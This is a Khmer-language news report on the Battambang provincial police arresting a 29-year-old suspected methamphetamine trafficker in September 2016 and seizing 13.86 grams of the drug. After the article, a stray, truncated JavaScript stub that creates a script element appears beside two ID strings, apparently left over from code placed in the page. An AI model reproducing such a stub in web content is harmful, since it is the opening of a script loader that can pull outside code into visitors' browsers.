កម្លាំងនគរបាលខេត្តបាត់ដំបងឃាត់ខ្លួនមុខសញ្ញាជួញដូរថ្នាំញៀនម្នាក់

ខេត្តបាត់ដំបង៖ ស្នងការរងទទួលបន្ទុកផ្នែកប្រឆាំងបទល្មើស លោកវរ:សេនីយ៍ឯក កុយ ហៀង ស្នង បានអោយព័ត៌មានយើងដឹងកាលពីរសៀលថ្ងៃនេះថា ជនសង្ស័យជាមុខសញ្ញាជួញដូរថ្នាំញៀនយ៉ាងសកម្មម្នាក់ ត្រូវបានកម្លាំងការិយាល័យប្រឆាំងបទល្មើសគ្រឿងញៀនសហការជាមួយកម្លាំងអន្តរាគមន៍នៃស្នងការដ្ឋាននគរបាលខេត្តបាត់ដំបងចុះឃាត់ខ្លួនដោយដកហូតបានថ្នាំញៀនមួយចំនួនធំ កាលពីវេលាម៉ោង៨និង៣០នាទីយប់ថ្ងៃទី៦ខែកញ្ញាឆ្នាំ២០១៦ នៅចំនុចភូមិទួលតាឯក សង្កាត់ ទួលតាឯក ក្រុង និងខេត្តបាត់ដំបង។

 

លោកបានអោយដឹងទៀតថាជនសង្ស័យដែលកម្លាំងបានឃាត់ខ្លួននោះមានឈ្មោះ យ៉ុង សម្បត្តិ អាយុ ២៩ឆ្នាំមានទីលំនៅ ភូមិទួលតាឯក សង្កាត់ ទួលតាឯក ក្រុង និងខេត្តបាត់ដំបង ដោយដកហូតវត្ថុតាងប្រភេទមេតំហ្វេតាមិន(ICE)ចំនួន២កូនថង់ ទម្ងន់ ១៣,៨៦ក្រាម ទូរស័ព្ទដៃ១គ្រឿង  កាបូបដាក់លុយចំនួន២ និងសំភារ:មួយចំនួនផងដែរ។

 

បច្ចុប្បន្នជនសង្ស័យគ្រឿងញៀនខាងលើរួមនិងវត្ថុតាងថ្នាំញៀនត្រូវបានកម្លាំងការិយាល័យជំនាញកសាងសំណុំរឿងចាប់បញ្ជូនទៅតុលាការដើម្បីយកទៅចាត់ការតាមផ្លូវច្បាប់ ៕

6bab44b5-5dbd-453f-b18c-1215ba609c42 71a7e8be-3637-4de2-b452-a6a8fa4d24ddvar d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More